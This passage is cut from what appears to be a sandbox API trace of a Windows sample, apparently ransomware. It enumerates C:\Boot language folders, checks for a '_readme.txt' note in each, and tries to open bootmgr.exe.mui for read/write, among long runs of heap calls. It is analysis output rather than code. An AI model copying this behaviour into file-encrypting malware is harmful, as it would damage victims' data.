lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.781] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.781] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.781] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0146.781] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.781] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.781] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.781] PathFindFileNameW (pszPath="") returned="" [0146.781] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.781] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.781] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.781] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.781] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.781] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.781] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.781] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0146.781] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0146.782] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.782] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.782] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.782] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.782] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.782] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0146.782] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.782] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.782] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb91e10, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.782] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned=".txt" [0146.782] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.782] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb91e10, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.782] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.782] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.782] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.782] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.782] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.782] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.782] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.782] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.782] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.782] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.783] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.783] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.784] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.784] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.784] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.784] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.784] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.784] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.784] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.784] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.784] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.784] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.784] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.784] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0146.784] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.784] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.784] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.784] PathFindFileNameW (pszPath="") returned="" [0146.784] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.784] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.784] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.784] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.784] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.784] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.785] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.785] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.785] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0146.785] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.785] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0146.785] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.785] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.785] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.785] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.785] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.785] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0146.785] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.785] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.785] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.785] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.785] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned=".txt" [0146.785] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.785] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.786] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.786] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.786] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.786] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 